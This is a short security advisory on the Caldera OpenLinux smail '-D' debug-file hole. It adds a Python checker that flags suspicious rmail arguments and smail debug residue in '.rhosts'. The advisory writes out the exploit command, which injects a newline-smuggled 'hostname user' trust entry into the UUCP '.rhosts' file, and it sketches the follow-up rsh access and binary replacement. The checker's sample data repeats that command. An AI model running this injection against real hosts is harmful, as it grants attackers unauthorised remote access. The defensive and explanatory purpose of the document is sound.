Caldera OpenLinux 'smail -D' Command Vulnerability
According to the Caldera advisory (CSSA-1999:001.0), smail's -D option specifies the file to which debug output is written. If an attacker submits a UUCP job containing the following rmail invocation:
rmail -N -D /usr/lib/uucp/.rhosts -oMs "joe\nhostname user\n" uucp
where '\n' is a newline, and 'hostname' and 'user' specify the attacking host and user, then 'smail' will happily append the following to the UUCP '.rhosts' file:
rmail: Debugging started: pid=25919
write_log:Received FROM:uucp HOST:joe
... some more lines ...
The attacker can then 'rsh' into the target host and try to exploit the UUCP account (e.g. by replacing the 'uux' binary).
Note that this hole is also exploitable locally; all you have to do is call 'uux rmail ....' to make it work.
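A defensive check for the pattern described above, as an added example that is not part of the original advisory or of smail itself: it refuses a queued rmail command line that carries -D or a line break inside any argument, and it flags smail debug output found in a '.rhosts' body. The function names are hypothetical, the samples are constructed from the text above, and treating an attached '-Dfile' form the same as '-D file' is an assumption.

```python
import re

# Line prefixes taken from the debug output quoted in the advisory text above.
RESIDUE = re.compile(r"^(rmail: Debugging started: pid=\d+|write_log:)")


def audit_rmail_args(argv):
    """Return the reasons a queued rmail command line should be refused."""
    findings = []
    for i, arg in enumerate(argv[1:], start=1):
        # Assumption: -D may carry its file name attached or as the next word.
        if arg.startswith("-D"):
            target = arg[2:] or (argv[i + 1] if i + 1 < len(argv) else "")
            findings.append(f"debug file option -D -> {target!r}")
        # A line break lets one argument become several lines in the debug file.
        if "\n" in arg or "\r" in arg:
            findings.append(f"line break inside argument {i}")
    return findings


def rhosts_residue(text):
    """Return (line number, line) pairs in a .rhosts body that are smail debug output."""
    return [(n, line) for n, line in enumerate(text.splitlines(), 1)
            if RESIDUE.match(line)]


# Constructed samples: the invocation and log lines quoted in the text above.
SAMPLE_ARGV = ["rmail", "-N", "-D", "/usr/lib/uucp/.rhosts",
               "-oMs", "joe\nhostname user\n", "uucp"]
CLEAN_ARGV = ["rmail", "-oMs", "joe", "uucp"]
SAMPLE_RHOSTS = ("rmail: Debugging started: pid=25919\n"
                 "write_log:Received FROM:uucp HOST:joe\n"
                 "hostname user\n")

if __name__ == "__main__":
    for reason in audit_rmail_args(SAMPLE_ARGV):
        print("refuse:", reason)
    for number, line in rhosts_residue(SAMPLE_RHOSTS):
        print(f".rhosts line {number} is debug output: {line}")
```

Any residue line means every entry in that '.rhosts' file should be treated as untrusted, since the injected 'hostname user' line is indistinguishable from a legitimate entry.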